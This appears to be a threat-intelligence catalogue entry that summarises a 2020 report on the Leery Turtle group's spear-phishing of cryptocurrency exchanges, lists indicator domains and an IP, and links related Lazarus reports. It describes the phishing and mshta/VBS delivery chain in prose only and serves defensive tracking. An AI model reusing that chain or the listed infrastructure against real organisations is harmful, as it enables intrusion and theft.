Leery Turtle Threat Report

2020-05-06 • Cyberstruggle •

https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf

#Cryptocurrency #LeeryTurtle #T1082 #T1071 #T1057 #T1001 #T1016 #T1047 #T1107 #T1060 #T1064 #T1131 #T1192 #T1170

Attachments

LeeryTurtleThreatReport_05_20.pdf (3 MB)

Thumbnail for Leery Turtle Threat Report

The Leery Turtle report profiles a financially motivated APT active since at least late 2017 against cryptocurrency exchange businesses worldwide. The group performs reconnaissance against technical and executive staff, sends decoy emails with benign attachments to identify likely openers, then uses spear-phishing that impersonates services such as Google Drive and OneDrive and spoofs coworker email identities. A typical attack delivers a password-protected PDF with an LNK shortcut disguised as the password file; the shortcut launches mshta to retrieve VBS payloads from attacker infrastructure, gather host information, and install persistence through a Startup-folder shortcut. The campaign relies on staged VBS downloaders, bit.ly redirection, server-side checks for MSHTA user agents, and C2 responses that deliver second-stage scripts.

Indicators of Compromise

Type	Value	First Seen	Last Seen
DOMAIN	mail.gdriveupload.info	2020-05-06	2022-01-13
DOMAIN	mail.googleupload.info	2020-05-06	2022-01-13
DOMAIN	att.gdrvupload.xyz	2020-05-06	2022-01-13
DOMAIN	drivegooglshare.xyz	2020-05-06	2021-05-24
DOMAIN	drivegoogle.publicvm.com	2019-07-09	2021-05-24
IPv4	203.144.133.42	2020-05-06	2020-09-18
DOMAIN	microsoft-update10v.amazonaws1.…	2020-05-06	2020-08-18
DOMAIN	check.onedrvdn.co	2020-05-06	2020-08-18
DOMAIN	support.gdrvcheck.co	2020-05-06	2020-08-18
DOMAIN	scloud.wechart.org	2020-05-06	2020-08-18
DOMAIN	gdocs.googleupload.info	2020-05-06	2020-08-18
DOMAIN	gbackup.gogleshare.xyz	2019-07-09	2020-08-18
DOMAIN	drive.gogleshare.xyz	2019-07-09	2020-08-18
DOMAIN	googldocs.org	2019-07-09	2020-08-18
DOMAIN	drivelnk.liveonedrvshare.xyz	2020-05-06	2020-05-06
DOMAIN	drive.googleupload.info	2020-05-06	2020-05-06
DOMAIN	start.showprice.xyz	2019-07-09	2020-05-06
DOMAIN	iellsfileshare.sharedrivegght.x…	2019-07-09	2020-05-06
DOMAIN	docs.googlefiledrive.com	2019-07-09	2020-05-06

Related Actors

Leery Turtle

Cyberstruggle

Crypto Core

First seen: May 2020

Last seen: May 2020

Related Reports

2020-08-18 • 32% Match

Lazarus group Campaign Targeting The Cryptocurrency Vertical

With Secure

#Cryptocurrency #Whitepaper #YARA #Lazarus #T1059.003 #T1070.004 #T1071.001 #T1112 #T1083 #T1566.003 #T1059.005 #T1053.005 #T1059.001 #T1552.001 #T1027.002 #T1003.001 #T1218.005 #T1021.001 #T1055.002 #T1543.003 #T1547.005 #T1070.001 #T1021.005 #T1078.002

Shares tag: Cryptocurrency • Shares 12 IOCs

2020-05-09 • 28% Match

Lazarus group leverages Covid themed HWP Document

dinu135dk

#COVID-19 #Lazarus #T1082 #T1140 #T1115 #T1497 #T1036 #T1027 #T1124 #T1057 #T1105 #T1087 #T1106 #T1047 #T1056 #T1033 #T1032 #T1022 #T1063 #T1138 #T1045

Shares tags: T1082, T1057, T1047 • Published within a week

2020-02-25 • 24% Match

DPRK Hidden Cobra Update: North Korean Malicious Cyber Activity

Sentinel One

#HiddenCobra #T1082 #T1090 #T1005 #T1041 #T1083 #T1027 #T1124 #T1204 #T1057 #T1003 #T1105 #T1055 #T1016 #T1048 #T1074 #T1056 #T1033 #T1012 #T1132 #T1043 #T1060 #T1064 #T1193 #T1065 #T1050 #T1024

Shares tags: T1082, T1057, T1016

2020-05-27 • 22% Match